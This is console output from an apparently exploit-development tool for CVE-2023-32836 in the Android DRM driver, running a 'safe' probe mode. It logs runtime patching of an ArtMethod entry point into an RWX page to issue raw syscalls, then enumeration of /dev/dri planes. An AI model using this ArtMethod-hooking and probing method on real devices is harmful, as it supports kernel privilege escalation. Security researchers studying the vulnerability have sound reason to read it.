[*] CVE-2023-32836 DRM exploit (Java/dalvikvm)
[*] pid=25834 uid=1000 mode=atomicprobe
[*] === DRM atomic entry probe (safe) ===

[*] Only SET_CLIENT_CAP, resource enumeration, and empty TEST_ONLY are used.
[+] Scratch buffer at 0x7be0abc000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x7be0993000
[+] Wrote syscall stubs: JNI@+0x00 (36B), Quick@+0x40 (36B)
[*] ArtMethod for nativeSyscall at 0x793e012680
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x794b41a2c0
    entry_point    = 0x1038000812c03c58
[*] Patching data_ (JNI) -> 0x7be0993000
[*] Patching entry_point (quick) -> 0x7be0993040
    data_       = 0x7be0993000 OK
    entry_point = 0x7be0993040 OK
[+] ArtMethod patched
[+] Syscall infrastructure ready

[*] openat /dev/dri/card0 ret=5
[*] SET_CLIENT_CAP UNIVERSAL_PLANES ret=0
[*] SET_CLIENT_CAP ATOMIC ret=0
[*] GETRESOURCES ret=0
    fbs=0 crtcs=3 connectors=2 encoders=3 size=1x1..4096x4096
[*] GETPLANERESOURCES(count) ret=0 count=16
[*] GETPLANERESOURCES(ids) ret=0
    plane[0] id=32 GETPLANE ret=0
        crtc=66 fb=148 possible_crtcs=0x1 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[1] id=44 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x1 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[2] id=46 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x1 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[3] id=48 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x1 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[4] id=50 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x1 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[5] id=52 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x1 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[6] id=54 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x1 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[7] id=56 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x1 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[8] id=58 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x1 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[9] id=60 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x1 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[10] id=62 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x1 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[11] id=64 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x1 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[12] id=86 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x2 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[13] id=88 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x2 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[14] id=97 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x4 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
    plane[15] id=99 GETPLANE ret=0
        crtc=0 fb=0 possible_crtcs=0x4 gamma=0 formats=20
        GETPROPERTIES(count) ret=-2 (ENOENT) count=0
[*] MODE_ATOMIC empty TEST_ONLY ret=-13 (EACCES)
[*] Done
